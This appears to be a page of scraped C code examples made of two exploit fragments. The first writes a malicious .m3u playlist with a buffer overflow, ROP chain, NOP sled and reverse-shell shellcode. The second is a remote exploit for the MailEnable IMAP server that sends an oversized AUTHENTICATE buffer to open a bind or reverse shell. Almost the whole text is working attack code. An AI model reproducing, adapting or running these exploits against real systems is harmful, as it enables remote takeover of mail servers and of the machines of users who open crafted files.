void file()
    { FILE* f=fopen("exploit.m3u","wb");
      unsigned char buf[100001];
	   
    if(!f) 
	  error_handle();
	make_reverseshell("127.0.0.1","2010");//change here with what you want...
	gen_random(buf,26117);  
	
	memcpy(buf+eip_offset,RET,4);
	memcpy(buf+eip_offset+4,"aaaa",4);
	memcpy(buf+eip_offset+8,instr1,4);
	memcpy(buf+eip_offset+12,instr2,4);
	memcpy(buf+eip_offset+16,"bbbb",4);
	memcpy(buf+eip_offset+20,instr3,4);
	memcpy(buf+eip_offset+24,virtualprotect,4);
	memcpy(buf+eip_offset+28,retaddr,4);
	memcpy(buf+eip_offset+32,lpaddr,4);
	memcpy(buf+eip_offset+36,sz,4);
	memcpy(buf+eip_offset+40,flnprot,4);
	
	memset(buf+eip_offset+44,0x90,300);
	memcpy(buf+eip_offset+68,instr5,4);
	memcpy(buf+eip_offset+72,instr4,4);
	memcpy(buf+eip_offset+84,instr6,4);
	memcpy(buf+eip_offset+92,instr7,4);
	memcpy(buf+eip_offset+96,instr4,4);
	
    memcpy(buf+eip_offset+104,instr8,4);	
	memcpy(buf+eip_offset+108,instr8,4);
	memcpy(buf+eip_offset+112,instr8,4);
	memcpy(buf+eip_offset+116,instr8,4);
	
	memcpy(buf+eip_offset+120,instr6,4);
	memcpy(buf+eip_offset+128,instr7,4);
	memcpy(buf+eip_offset+132,instr9,4);
	
	memcpy(buf+eip_offset+136,instr4,4);
	memcpy(buf+eip_offset+144,instr4,4);
	memcpy(buf+eip_offset+152,instr4,4);
	
	memcpy(buf+eip_offset+160,instr8,4);	
	memcpy(buf+eip_offset+164,instr8,4);
	memcpy(buf+eip_offset+168,instr8,4);
	memcpy(buf+eip_offset+172,instr8,4);
	
	memcpy(buf+eip_offset+176,instr6,4);
	memcpy(buf+eip_offset+184,instr7,4);
	memcpy(buf+eip_offset+188,instr9,4);
	
	memcpy(buf+eip_offset+192,instr10,4);
	
	memcpy(buf+eip_offset+196,instr8,4);	
	memcpy(buf+eip_offset+200,instr8,4);
	memcpy(buf+eip_offset+204,instr8,4);
	memcpy(buf+eip_offset+208,instr8,4);
	
	memcpy(buf+eip_offset+212,instr6,4);
	memcpy(buf+eip_offset+220,instr11,4);
	memcpy(buf+eip_offset+224,instr11,4);
	memcpy(buf+eip_offset+228,instr12,4);
	
	memcpy(buf+eip_offset+344,reverse_sc,strlen(reverse_sc));//change here shellcode
	
	fwrite(HEAD,sizeof(char),strlen(HEAD),f);
	fwrite(URL,sizeof(char),strlen(URL),f);
	fwrite(buf,sizeof(char),strlen(buf),f);
		
	fclose(f);
    }
Exemple #2
0
int main(int argc, char *argv[]) {

    struct sockaddr_in trg;
    struct hostent *he;
    long addr;
    unsigned short port;
    unsigned long ip;
    int sockfd, buff,rc,opt,i;
    int target=0,rport=143,lport=7320;
    char *host=NULL,*lhost=NULL,*cbport;
    char evilbuf[2048];
    char buffer[1024];
    char *request;
    if(argc < 3 ) {
	help(argv[0]);
	exit(0);
    }
    while ((opt = getopt (argc, argv, "h:p:t:b:r:")) != -1){
          switch (opt){
	        case 'h':
	            host = optarg;
	            break;
	        case 'p':
                rport = atoi(optarg);
                if(rport > 65535 || rport < 1){
                    printf("[-] Port %d is invalid\n",rport);
                    return 1;
                }
                break;
            case 't':
                target = atoi(optarg);
                for(i = 0; targets[i].platform; i++);
                if(target >= i && target != 1337){
                    printf("[-] Wtf are you trying to target?\n");
                    help(argv[0]);
                }
                break;
            case 'b':
                lport = atoi(optarg);
                cbport = optarg;
                if(lport > 65535 || lport < 1){
                    printf("[-] Port %d is invalid\n",lport);
                    return 1;
                }
                break;
            case 'r':
                lhost = optarg;
                break;
            default:
                help(argv[0]);
        }
    }
    
    if(host == NULL)
        help(argv[0]);

    printf("\n\n-=[ MailEnable Imapd remote exploit ::: Coded by Expanders ]=-\n");
    he = gethostbyname(host);
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    request = (char *) malloc(12344);
    trg.sin_family = AF_INET;
    trg.sin_port = htons(rport);
    trg.sin_addr = *((struct in_addr *) he->h_addr);
    memset(&(trg.sin_zero), '\0', 8);
    printf("\n\n[-] Targeting: %s\n",targets[target].platform);
    if ( lhost != NULL )
       printf("[-] Reverse Shell on %s:%d\n\n",lhost,lport);
    else
       printf("[-] Bind Shell on %s:%d\n\n",host,lport);
    printf("[-]Connecting to target   \t...");
    rc=connect(sockfd, (struct sockaddr *)&trg, sizeof(struct sockaddr_in));
    if(rc==0) {
              printf("[Done]\n[-]Building evil buffer   \t...");
              memset(evilbuf,'A',1016);
              memcpy(evilbuf+1016,targets[target].ecxloc,4);;
              memset(evilbuf+1020,'A',2);
              memcpy(evilbuf+1022,targets[target].ecxloc,4);
              memcpy(evilbuf+1026,targets[target].retloc,4);
              memset(evilbuf+1030,0x90,4);
              if ( lhost == NULL) {
                 make_bindshell(lport);
                 memcpy(evilbuf+1034,portbind_sc,sizeof(portbind_sc));
              } else {
                make_reverseshell(lhost,cbport);
                memcpy(evilbuf+1034,reverse_sc,sizeof(reverse_sc));
              }
              printf("[Done]\n[-]Sending evil request   \t...");
              sprintf(request,"A001 AUTHENTICATE %s\r\n",evilbuf);
              send(sockfd,request,strlen(request),0);
              buff=recv(sockfd, buffer, 256, 0);
              if ( lhost == NULL)
                 printf("[Done]\n\n[------Now-telnet-(%s %d)------]\n\n",host,lport);
              else
                 printf("[Done]\n\n[------Now-wait-reverse-on-port-%d------]\n\n",lport);
    }
    else
              printf("[Fail] -> Unable to connect\n\n");
    close(sockfd);
    return 0;
}